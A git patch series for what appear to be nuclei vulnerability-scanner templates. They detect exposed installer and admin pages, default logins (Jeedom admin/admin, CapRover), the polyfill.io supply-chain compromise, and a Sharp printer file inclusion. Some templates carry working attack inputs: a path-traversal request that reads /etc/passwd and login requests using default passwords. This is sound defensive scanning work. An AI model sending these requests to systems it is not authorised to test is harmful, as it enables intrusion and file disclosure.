490a0046304402204c43403e564edf7935893649cf49e06d1975637fffd1f6cc7d7ec53175e51be4022059576fde1b9ebd29431b90b7b8a6e334ce2bcabba38e5d8878909afb785c00eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml index 4a8bc6b75c..77add5d6e3 100644 --- a/http/technologies/wordpress/plugins/wp-optimize.yaml +++ b/http/technologies/wordpress/plugins/wp-optimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100ff3ae95c931d6004649fc07cc86eae6708c79ac5e94298c709f8eaa9f53c2f30022100cc963347a717463bb60dfbb7764e4e9a64f2c9c3ad52e7cbf889bd44d1336165:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml index d2c74355bd..6a2d48b3cd 100644 --- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml +++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f364516d26128bb6f34e50ad595dd7d20655c2cf34c202e54bc3d85f2fd228d402207f26ef6cf2bde0d038878e3d723c02186dd30a94aa81b38de3532e4b46578a2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml index 94b8494b08..e9a6b7cdee 100644 --- a/http/technologies/wordpress/plugins/wp-reset.yaml +++ b/http/technologies/wordpress/plugins/wp-reset.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022008788947143a9b4e06c774e4a70edb28b2832c7bf72a59d62a5c590da8b38692022100ff5f731044a9780326ae9a6b91004ec8dabcfeb1a12ddf19e380623ec411be20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml index 108aba79e9..cddd71bc0c 100644 --- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml +++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220790ca7cd3f97cf59f75a0155add391ea1610cb8c44c89e2cd6118abd2d14193d02201dbe4062b395fd42cfe427c8835bed4607da9c55c411ae5d282589037eadb05e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml index f6f6bf5566..c5714b7834 100644 --- a/http/technologies/wordpress/plugins/wp-rollback.yaml +++ b/http/technologies/wordpress/plugins/wp-rollback.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100cbc89c9ba0e84f816c74a579fefe1b5d9a12062c8e94cbf94dd79db914225d01022100e23fb828d19a0b4b9745eb5833d01c58fc9db415bd60691c55b230ef0fd763c2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml index 483cb7cac7..07e0e157a7 100644 --- a/http/technologies/wordpress/plugins/wp-seopress.yaml +++ b/http/technologies/wordpress/plugins/wp-seopress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201a5ba6eae9f1f060c68135689bc63303a2f3c01c0186c772cd43d8ecd9ebc8ac022100fd1c417cffc3a2ba89c18378402e7f263fb5d0e109d5047afbf0bc035548477c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml index a132c98df4..74b9b23a98 100644 --- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml +++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202030487b439fa918d59e5fd6d3c9d606f15e440c5e2ce409dcc2ca2ab72e34830221009102eed2b913ee6a00a56709a1901fe4ffc0e8be04ac6b0f5e845ff9350ab212:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml index 135bbee046..b801198157 100644 --- a/http/technologies/wordpress/plugins/wp-smushit.yaml +++ b/http/technologies/wordpress/plugins/wp-smushit.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200252864b5bb92762b1985001888ba26dc6b52c0800cc9e7e6d8e03a0dd6705da0221008b6804f758ea49586c14b32438f954ebb2d3fbed5f349fab00da598c3d600749:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml index 5b690d96c0..6f26d28e2f 100644 --- a/http/technologies/wordpress/plugins/wp-statistics.yaml +++ b/http/technologies/wordpress/plugins/wp-statistics.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022049c114d5dd227f646413c096640ae670e1d2f8f383b92d7dea66ced3492ceed7022100b96a2ed4787feca3a3aa8cb5ed644aa47df64539c4095bcbd6dbd23db337f6c5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml index 16c7d6cff5..5efb67d3aa 100644 --- a/http/technologies/wordpress/plugins/wp-super-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a88e5b511a781692162cded1b9bff5b150d8f038c47263a76bc4e18a0605541e0221008d94c49c8a5b8c6695dbcfeca651f8bdbea59beebaf8d71ddf1be60baf8223f9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml index ab099f357e..58e7e65b16 100644 --- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fd677a7ed97e22d77961a405ebb85e20fbedee6fece4a596a18d593b0534c37d02203303c179b8d34c11759792fb50f904ba4c2b76b505d058b566c8fdc9657bea72:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml index ad0b8f8fed..d253055049 100644 --- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml +++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009d5b1f83ed520d27ddf007bef7cbe71790ff0abb74b8031902056f4643a274f002207adb22452c7083f598d065fe57db664dd948c936631c42cd0642a262ca246923:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml index 58e5e828bf..9edee7f061 100644 --- a/http/technologies/wordpress/plugins/wpforms-lite.yaml +++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022027816f731712a401a1984f97cbf4e2689fd401884da4b8d2870133c801ecd11c0220740d8b965b7d900694c21617684f74f9f7a41371cfc9c306f8c4c0a81ab169c9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml index f943c7afeb..9809306750 100644 --- a/http/technologies/wordpress/plugins/wps-hide-login.yaml +++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100914daec29e2121125eef430fd46178f74611343cda215d26c56230e9c9f881e60220727ba1a48444de27cfe4cba0b46953a0c670af3c8e9d104e75469ceaa10bba43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml index 062e5c85b4..b5c71b18d3 100644 --- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml +++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fde8f06fb067fda931a85d78e3f3525b9b670c3ddd2df0d33dd6bd63ed7f4b99022013310b9f27f451c3d7788b6e1583aa016d38c763d59ffff58e600dbcd76d97b7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml index 6dcfdda117..d35426f3f5 100644 --- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml +++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206d547277b7c277428c02f2352594a85d8e8c484931c5ea06dfe10e1866cacddc022100bbbff5bc6d4190e759ff6a098bc8c6540f3f385b2536de49ed775048a06eb6c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b950be1cd1e4b6b638a1e45c8a5c25e49ec178e4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 28 Jun 2024 14:17:13 +0530 Subject: [PATCH 0708/1841] Create piwigo-installer.yaml --- .../installer/piwigo-installer.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/misconfiguration/installer/piwigo-installer.yaml diff --git a/http/misconfiguration/installer/piwigo-installer.yaml b/http/misconfiguration/installer/piwigo-installer.yaml new file mode 100644 index 0000000000..77b98fee35 --- /dev/null +++ b/http/misconfiguration/installer/piwigo-installer.yaml @@ -0,0 +1,34 @@ +id: piwigo-installer + +info: + name: Piwigo Installation Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Piwigo is susceptible to the Installation page exposure due to misconfiguration. + metadata: + verified: true + max-request: 1 + shodan-query: html:"Piwigo" html:"- Installation" + tags: misconfig,exposure,install,piwigo + +http: + - method: GET + path: + - "{{BaseURL}}/install.php" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'Piwigo ([0-9.]+) \- Installation' + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 1ee4d626fa3bb2f30857cd810957900591aae545 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 28 Jun 2024 14:29:57 +0530 Subject: [PATCH 0709/1841] Create forgejo-repo.yaml --- http/misconfiguration/forgejo-repo.yaml | 37 +++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/misconfiguration/forgejo-repo.yaml diff --git a/http/misconfiguration/forgejo-repo.yaml b/http/misconfiguration/forgejo-repo.yaml new file mode 100644 index 0000000000..42a6106c80 --- /dev/null +++ b/http/misconfiguration/forgejo-repo.yaml @@ -0,0 +1,37 @@ +id: forgejo-repo + +info: + name: Forgejo Repositories - Exposure + author: DhiyaneshDK + severity: medium + description: | + Forgejo repo is exposed + metadata: + verified: true + max-request: 1 + shodan-query: html:"Forgejo" + tags: misconfig,exposure,forgejo + +http: + - method: GET + path: + - "{{BaseURL}}/explore/repos" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Powered by Forgejo' + - 'Explore</a>' + - 'Repositories' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From ba0b6917b9b1946a3164c3cd27885ba6d5800ece Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 28 Jun 2024 14:46:55 +0530 Subject: [PATCH 0710/1841] Create poste-io-installer.yaml --- .../installer/poste-io-installer.yaml | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 http/misconfiguration/installer/poste-io-installer.yaml diff --git a/http/misconfiguration/installer/poste-io-installer.yaml b/http/misconfiguration/installer/poste-io-installer.yaml new file mode 100644 index 0000000000..028e2d4a8a --- /dev/null +++ b/http/misconfiguration/installer/poste-io-installer.yaml @@ -0,0 +1,36 @@ +id: poste-io-installer + +info: + name: Poste.io Installer Page - Exposure + author: DhiyaneshDK + severity: high + description: | + Poste.io is susceptible to the Installation page exposure due to misconfiguration. + metadata: + verified: true + max-request: 1 + fofa-query: body="Initial server configuration" + tags: misconfig,exposure,poste-io,install + +http: + - method: GET + path: + - "{{BaseURL}}/admin/install/server" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Initial server configuration' + - 'poste' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From b4ecb01feb4cd53e07e55b6287728c22db5f17ad Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran <leedhiyanesh@gmail.com> Date: Fri, 28 Jun 2024 15:15:28 +0530 Subject: [PATCH 0711/1841] Create filestash-admin-config.yaml --- .../configs/filestash-admin-config.yaml | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 http/exposures/configs/filestash-admin-config.yaml diff --git a/http/exposures/configs/filestash-admin-config.yaml b/http/exposures/configs/filestash-admin-config.yaml new file mode 100644 index 0000000000..ab23a5bc52 --- /dev/null +++ b/http/exposures/configs/filestash-admin-config.yaml @@ -0,0 +1,36 @@ +id: filestash-admin-config + +info: + name: Filestash Admin Password Configuration + author: DhiyaneshDK + severity: high + description: | + Filestash is susceptible to the Admin Password Configuration page exposure due to misconfiguration. + metadata: + verified: true + max-request: 1 + shodan-query: html:"<title>Admin Console" + tags: exposure,filestash,config + +http: + - method: GET + path: + - "{{BaseURL}}/admin/setup" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Admin Console' + - 'component-loader' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 5ae692746592654577bd17635ba145a9c915c89e Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 28 Jun 2024 15:40:09 +0530 Subject: [PATCH 0712/1841] Create seq-dashboard-unath.yaml --- .../misconfiguration/seq-dashboard-unath.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/misconfiguration/seq-dashboard-unath.yaml diff --git a/http/misconfiguration/seq-dashboard-unath.yaml b/http/misconfiguration/seq-dashboard-unath.yaml new file mode 100644 index 0000000000..0ffa84adec --- /dev/null +++ b/http/misconfiguration/seq-dashboard-unath.yaml @@ -0,0 +1,34 @@ +id: seq-dashboard-unauth + +info: + name: Seq Dashboard - Unauthenticated + author: DhiyaneshDK + severity: high + description: | + Seq is exposed without authentication + metadata: + verified: true + max-request: 1 + shodan-query: title:"Seq" + tags: misconfig,exposure,seq,dashboard + +http: + - method: GET + path: + - "{{BaseURL}}/#/dashboards" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Log out' + - 'dashboards' + condition: and + + - type: status + status: + - 200 From e2681022461a5c39e4c7d106b63999775640a4ab Mon Sep 17 00:00:00 2001 From: abut0n Date: Fri, 28 Jun 2024 13:21:11 +0200 Subject: [PATCH 0713/1841] Create CVE-2024-38526.yaml --- headless/2024/CVE-2024-38526.yaml | 56 +++++++++++++++++++++++++++++++ 1 file changed, 56 insertions(+) create mode 100644 headless/2024/CVE-2024-38526.yaml diff --git a/headless/2024/CVE-2024-38526.yaml b/headless/2024/CVE-2024-38526.yaml new file mode 100644 index 0000000000..445d1debf4 --- /dev/null +++ b/headless/2024/CVE-2024-38526.yaml @@ -0,0 +1,56 @@ +id: CVE-2024-38526 + +info: + name: CVE-2024-38526 - Untrusted 3rd party + author: abut0n + severity: high + description: | + The polyfill.js is a popular open source library to support older browsers. 100K+ sites embed it using the cdn.polyfill.io. However, in February of 2024, a Chinese company bought the domain and the Github account. Since then, this domain was caught injecting malware on mobile devices via any site that embeds cdn.polyfill.io + impact: | + The new Chinese owner of the popular Polyfill JS project injects malware into more than 100 thousand sites. + remediation: | + Remove the dependecy. + reference: + - https://sansec.io/research/polyfill-supply-chain-attack + - https://nvd.nist.gov/vuln/detail/CVE-2024-38526 + - https://x.com/triblondon/status/1761852117579427975 + tags: CVE,CVE-2024-38526,headless,supply-chain + +headless: + - steps: + - args: + url: "{{BaseURL}}" + action: navigate + + - action: waitload + + - action: script + name: extract + args: + code: | + () => { + return '\n' + [...new Set(Array.from(document.querySelectorAll('[src], [href], [url], [action]')).map(i => i.src || i.href || i.url || i.action))].join('\r\n') + '\n' + } + + extractors: + - type: kval + part: extract + name: urls + internal: true + kval: + - extract + + matchers: + - type: word + words: + - "polyfill.io" + # More domains that have been used by the same actor to spread malware since at least June 2023: bootcdn.net, bootcss.com, staticfile.net, staticfile.org, unionadjs.com, xhsbpza.com, union.macoms.la, newcrbpc.com. + - "bootcdn.net" + - "bootcss.com" + - "staticfile.net" + - "staticfile.org" + - "unionadjs.com" + - "xhsbpza.com" + - "union.macoms.la" + - "newcrbpc.com" + part: urls From 41a2e51ee1248d70ca90f2eba066664ec3e93f4c Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 28 Jun 2024 17:35:16 +0530 Subject: [PATCH 0714/1841] Create jeedom-default-login.yaml --- http/default-logins/jeedom-default-login.yaml | 46 +++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 http/default-logins/jeedom-default-login.yaml diff --git a/http/default-logins/jeedom-default-login.yaml b/http/default-logins/jeedom-default-login.yaml new file mode 100644 index 0000000000..3aab6e216d --- /dev/null +++ b/http/default-logins/jeedom-default-login.yaml @@ -0,0 +1,46 @@ +id: jeedom-default-login + +info: + name: Jeedom - Default Login + author: ritikchaddha + severity: high + description: | + Jeedom default login has been detected. + metadata: + verified: true + max-request: 2 + shodan-query: title:"Jeedom" + tags: jeedom,default-login,misconfig + +variables: + username: admin + password: admin + +http: + - raw: + - | + POST /core/ajax/user.ajax.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + + action=login&username={{username}}&password={{password}}&twoFactorCode=&storeConnection=0 + + - | + GET /index.php?v=d&p=dashboard HTTP/1.1 + Host: {{Hostname}} + + matchers-condition: and + matchers: + - type: word + part: body_1 + words: + - 'state":"ok' + - 'result":' + condition: and + + - type: word + part: body_2 + words: + - "logout=1" + - "Plugins" + condition: and From 79a78622cee629208e91c6ab841cc242d5d5cea0 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Fri, 28 Jun 2024 17:51:15 +0530 Subject: [PATCH 0715/1841] Create caprover-default-login.yaml --- .../caprover-default-login.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/default-logins/caprover-default-login.yaml diff --git a/http/default-logins/caprover-default-login.yaml b/http/default-logins/caprover-default-login.yaml new file mode 100644 index 0000000000..710c0bfde9 --- /dev/null +++ b/http/default-logins/caprover-default-login.yaml @@ -0,0 +1,34 @@ +id: caprover-default-login + +info: + name: Caprover - Default Login + author: ritikchaddha + severity: high + description: | + Caprover defaultl login has been detected. + metadata: + verified: true + max-request: 2 + shodan-query: http.favicon.hash:988422585 + tags: caprover,default-login,misconfig + +variables: + password: captain42 + +http: + - raw: + - | + POST /api/v2/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + x-namespace: captain + + {"password":"{{password}}"} + + matchers: + - type: dsl + dsl: + - 'contains_all(body, "status\":100", "Login succeeded", "token\":")' + - 'contains(header, "application/json")' + - 'status_code == 200' + condition: and From facb04fa2c25ee29f010bd2218df3a2d56a65c53 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 28 Jun 2024 17:52:46 +0530 Subject: [PATCH 0716/1841] Rename http/default-logins/jeedom-default-login.yaml to http/default-logins/jeedom/jeedom-default-login.yaml --- http/default-logins/{ => jeedom}/jeedom-default-login.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/default-logins/{ => jeedom}/jeedom-default-login.yaml (100%) diff --git a/http/default-logins/jeedom-default-login.yaml b/http/default-logins/jeedom/jeedom-default-login.yaml similarity index 100% rename from http/default-logins/jeedom-default-login.yaml rename to http/default-logins/jeedom/jeedom-default-login.yaml From cb5e8e0ff49da46869194e5a9724c22546fe863d Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 28 Jun 2024 17:56:08 +0530 Subject: [PATCH 0717/1841] minor update --- http/default-logins/{ => caprover}/caprover-default-login.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename http/default-logins/{ => caprover}/caprover-default-login.yaml (97%) diff --git a/http/default-logins/caprover-default-login.yaml b/http/default-logins/caprover/caprover-default-login.yaml similarity index 97% rename from http/default-logins/caprover-default-login.yaml rename to http/default-logins/caprover/caprover-default-login.yaml index 710c0bfde9..9fc70b65fa 100644 --- a/http/default-logins/caprover-default-login.yaml +++ b/http/default-logins/caprover/caprover-default-login.yaml @@ -8,7 +8,7 @@ info: Caprover defaultl login has been detected. metadata: verified: true - max-request: 2 + max-request: 1 shodan-query: http.favicon.hash:988422585 tags: caprover,default-login,misconfig From 68ab7e0d34ebff605eb8fb5e6ef1b23798c6831d Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 29 Jun 2024 16:18:40 +0530 Subject: [PATCH 0718/1841] updated matcher --- http/exposures/configs/filestash-admin-config.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/http/exposures/configs/filestash-admin-config.yaml b/http/exposures/configs/filestash-admin-config.yaml index ab23a5bc52..3aa2de4983 100644 --- a/http/exposures/configs/filestash-admin-config.yaml +++ b/http/exposures/configs/filestash-admin-config.yaml @@ -26,11 +26,6 @@ http: - 'component-loader' condition: and - - type: word - part: header - words: - - "text/html" - - type: status status: - 200 From 2a663b5565c8cc3bf7380ab4180c81e90012ff00 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 29 Jun 2024 16:19:37 +0530 Subject: [PATCH 0719/1841] updated matcher & name --- http/misconfiguration/installer/poste-io-installer.yaml | 7 +------ 1 file changed, 1 insertion(+), 6 deletions(-) diff --git a/http/misconfiguration/installer/poste-io-installer.yaml b/http/misconfiguration/installer/poste-io-installer.yaml index 028e2d4a8a..3ad57c04f0 100644 --- a/http/misconfiguration/installer/poste-io-installer.yaml +++ b/http/misconfiguration/installer/poste-io-installer.yaml @@ -1,7 +1,7 @@ id: poste-io-installer info: - name: Poste.io Installer Page - Exposure + name: Poste.io - Installer author: DhiyaneshDK severity: high description: | @@ -26,11 +26,6 @@ http: - 'poste' condition: and - - type: word - part: header - words: - - "text/html" - - type: status status: - 200 From 96d4d6e84bc17919312e3dacf0cbd7f0b038ae3b Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 29 Jun 2024 16:22:58 +0530 Subject: [PATCH 0720/1841] Update and rename forgejo-repo.yaml to forgejo-repo-exposure.yaml --- .../{forgejo-repo.yaml => forgejo-repo-exposure.yaml} | 9 ++------- 1 file changed, 2 insertions(+), 7 deletions(-) rename http/misconfiguration/{forgejo-repo.yaml => forgejo-repo-exposure.yaml} (81%) diff --git a/http/misconfiguration/forgejo-repo.yaml b/http/misconfiguration/forgejo-repo-exposure.yaml similarity index 81% rename from http/misconfiguration/forgejo-repo.yaml rename to http/misconfiguration/forgejo-repo-exposure.yaml index 42a6106c80..a19178494c 100644 --- a/http/misconfiguration/forgejo-repo.yaml +++ b/http/misconfiguration/forgejo-repo-exposure.yaml @@ -1,11 +1,11 @@ -id: forgejo-repo +id: forgejo-repo-exposure info: name: Forgejo Repositories - Exposure author: DhiyaneshDK severity: medium description: | - Forgejo repo is exposed + The Forgejo repo is being exposed publically. metadata: verified: true max-request: 1 @@ -27,11 +27,6 @@ http: - 'Repositories' condition: and - - type: word - part: header - words: - - "text/html" - - type: status status: - 200 From 2ed68023d3a781cc3ad2ed8cb188520f1352b1ed Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 29 Jun 2024 16:24:34 +0530 Subject: [PATCH 0721/1841] Update piwigo-installer.yaml --- http/misconfiguration/installer/piwigo-installer.yaml | 5 ----- 1 file changed, 5 deletions(-) diff --git a/http/misconfiguration/installer/piwigo-installer.yaml b/http/misconfiguration/installer/piwigo-installer.yaml index 77b98fee35..fea6c9aac8 100644 --- a/http/misconfiguration/installer/piwigo-installer.yaml +++ b/http/misconfiguration/installer/piwigo-installer.yaml @@ -24,11 +24,6 @@ http: regex: - 'Piwigo ([0-9.]+) \- Installation' - - type: word - part: header - words: - - "text/html" - - type: status status: - 200 From 2dd8e536211a1c1b8fac82c3ee59a60ecf9be642 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Sun, 30 Jun 2024 15:36:37 +0900 Subject: [PATCH 0722/1841] Create sharp-multi-function-printers-local-file-disclosure.yaml It was observed that Sharp printers are vulnerable to a local file inclusion without authentication. Any attacker can read any file located in the printer. Signed-off-by: GwanYeong Kim --- ...nction-printers-local-file-disclosure.yaml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 http/vulnerabilities/other/sharp-multi-function-printers-local-file-disclosure.yaml diff --git a/http/vulnerabilities/other/sharp-multi-function-printers-local-file-disclosure.yaml b/http/vulnerabilities/other/sharp-multi-function-printers-local-file-disclosure.yaml new file mode 100644 index 0000000000..94a6c69194 --- /dev/null +++ b/http/vulnerabilities/other/sharp-multi-function-printers-local-file-disclosure.yaml @@ -0,0 +1,34 @@ +id: sharp-multi-function-printers-local-file-disclosure + +info: + name: Sharp Multifunction Printers - Local File Inclusion + author: gy741 + severity: high + description: | + It was observed that Sharp printers are vulnerable to a local file inclusion without authentication. Any attacker can read any file located in the printer. + remediation: Apply all relevant security patches and product upgrades. + reference: + - https://pierrekim.github.io/blog/2024-06-27-sharp-mfp-17-vulnerabilities.html#pre-auth-lfi + - https://jvn.jp/en/vu/JVNVU93051062/index.html + - https://global.sharp/products/copier/info/info_security_2024-05.html + metadata: + verified: true + max-request: 1 + shodan-query: "Set-Cookie: MFPSESSIONID=" + tags: sharp,printer,lfi + +http: + - method: GET + path: + - "{{BaseURL}}/installed_emanual_down.html?path=/manual/../../../etc/passwd" + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - "root:.*:0:0:" + + - type: status + status: + - 200 From 3581ffda69053279f2be1405a227331f54f543c4 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 28 Jun 2024 14:29:57 +0530 Subject: [PATCH 0723/1841] Create forgejo-repo.yaml --- http/misconfiguration/forgejo-repo.yaml | 37 +++++++++++++++++++++++++ 1 file changed, 37 insertions(+) create mode 100644 http/misconfiguration/forgejo-repo.yaml diff --git a/http/misconfiguration/forgejo-repo.yaml b/http/misconfiguration/forgejo-repo.yaml new file mode 100644 index 0000000000..42a6106c80 --- /dev/null +++ b/http/misconfiguration/forgejo-repo.yaml @@ -0,0 +1,37 @@ +id: forgejo-repo + +info: + name: Forgejo Repositories - Exposure + author: DhiyaneshDK + severity: medium + description: | + Forgejo repo is exposed + metadata: + verified: true + max-request: 1 + shodan-query: html:"Forgejo" + tags: misconfig,exposure,forgejo + +http: + - method: GET + path: + - "{{BaseURL}}/explore/repos" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'Powered by Forgejo' + - 'Explore' + - 'Repositories' + condition: and + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 From 9f71fa550cd767f20a9d0349bdc6ff5827dc2e14 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Sat, 29 Jun 2024 16:22:58 +0530 Subject: [PATCH 0724/1841] Update and rename forgejo-repo.yaml to forgejo-repo-exposure.yaml --- .../{forgejo-repo.yaml => forgejo-repo-exposure.yaml} | 9 ++------- 1 file changed, 2 insertions(+), 7 deletions(-) rename http/misconfiguration/{forgejo-repo.yaml => forgejo-repo-exposure.yaml} (81%) diff --git a/http/misconfiguration/forgejo-repo.yaml b/http/misconfiguration/forgejo-repo-exposure.yaml similarity index 81% rename from http/misconfiguration/forgejo-repo.yaml rename to http/misconfiguration/forgejo-repo-exposure.yaml index 